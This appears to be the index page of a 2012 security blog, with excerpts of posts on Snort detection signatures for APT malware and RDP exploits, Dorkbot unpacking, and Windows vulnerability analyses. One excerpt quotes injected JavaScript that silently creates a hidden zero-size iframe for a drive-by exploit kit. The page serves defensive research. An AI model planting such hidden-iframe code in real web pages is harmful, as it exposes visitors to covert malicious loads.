Snort Signatures for LuckyCat APT Campaign

30 Mar 2012   | Author: Abhijeet |  No Comments

Trend Micro blog published a paper titled Luckycat Redux, which looked into the activities of the Luckycat APT campaign.  As per the report, LuckyCat campaign targeted diverse set of industries including Aerospace, Shipping, Energy, Military, Engineering and Tibetan Activist using variety of malwares.  Trend was able to track back the sources of the attack in China. Below [...]

Manually unpacking Dorkbot

24 Mar 2012   | Author: Abhijeet |  No Comments

Yesterday I encounter another sample (SHA1: e3a7a9c9a5fcdc0b4bd6ffd9a5b83ba7a22353af) of Dorkbot while analyzing my honeypot. Knowing most of the Dorkbot samples are packed with UPX, I used the upx tool to unpack the binary. However, just to recall my manual steps for unpacking binaries, I thought of writing this post. Let’s use PEiD tool to verify if [...]

NIDS signature for MS12-020 RDP DoS

19 Mar 2012   | Author: Abhijeet |  1 Comment

The signature specified in the previous entry was for detecting the RCE/DoS attempt within TargetParams structure of RDP protocol. However, a DoS PoC listed here, exploits another MaxParam structure from the same RDP protocol. The PoC is developed by jduck  (Joshua J. Drake) of Accuvant and sets the value of first parameter maxChannelIds to 4294967295. This value is causing [...]

Snort Signature for RDP TargetParams Exploit

17 Mar 2012   | Author: Abhijeet |  1 Comment

With the release of Exploit PoC code for CVE-2012-0002 by the finder himself has definitely increased the chances of exploitation of this vulnerability. Microsoft has released the patch to address the vulnerability. However, considering the patch deployment life cycle and exploit attempts, we need to be proactive in detection and blocking all the attempts of [...]

Snort detections for Targeted attack using CVE-2012-0754 exploit

6 Mar 2012   | Author: Abhijeet |  No Comments

 Contagiodump blog published an analysis of a targeted attack using new CVE-2012-0754 exploit. The blog talks about the whole exploit attempt and a great details about the exploit and payload analysis. I will not repeat the analysis in this post but talk about the key points. I liked the adjacent picture posted on contagio blog so [...]

Snort Detections for Drive-by Exploitkit

23 Feb 2012   | Author: Abhijeet |  No Comments

Today, while browsing for some information I ended up landing on a below website. I accidently had my fiddler instance open and saw an embedded iframe in the website.  Here is the snip of the injected iframe. window.setTimeout(function(){ var JSinj=document.createElement(‘iframe’); JSinj.src=’’+escape(document.referrer||”); JSinj.width=’0′; JSinj.height=’0′; JSinj.frameborder=’0′; JSinj.marginheight=’0′; JSinj.marginwidth=’0′; JSinj.border=’0′; try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj); Iframe took me to [...]

Detecting Data Exfiltration Attempts of TSPY_SPCESEND.A

11 Feb 2012   | Author: Abhijeet |  No Comments

  Recently, a malware was seen in the wild which grabbed Microsoft Word and Excel files present on the infected system and uploaded them to a free file sharing website File sharing websites were previously and are still involved in malware drive-by attempts but using them as a data exfiltration channel was seen for [...]

Snort Detection Rules for APT Malware MSUpdater.exe

3 Feb 2012   | Author: Abhijeet |  1 Comment

Background: On 31st January 2012, ZScalar and Seculert posted analysis on recently identified RAT malware which is believed to be used in government related targeted attacks. Both of these firms, identified command and control beacon patterns and independently published them on their respective websites. Similar to all the APT attacks, these C&C patterns were built [...]

Exploitation of CVE-2012-0003: Heap Overflow in winmm.dll

30 Jan 2012   | Author: Abhijeet |  1 Comment

Very first exploit for the MS12-004 was seen in the wild on last Friday. As soon as the discovery of the exploit attempt was made, researchers were quick to post their analysis on the vulnerability. Metasploit module was also made available to public in its latest revision 14640. In this post I will share a [...]

Understanding CVE-2012-0003: RCE in Microsoft Windows Media Player

29 Jan 2012   | Author: Abhijeet |  No Comments

As ever, the opinions expressed in this website are personal to me and do not necessarily reflect the opinions of my employer. As part of January’s Patch Tuesday, we released 7 patches targeting 8 individual vulnerabilities. Out of these 8 vulnerabilities, I will talk about CVE-2012-0003 – memory corruption vulnerability in Windows Media component that [...]

Get Adobe Flash playerPlugin by wordpress themes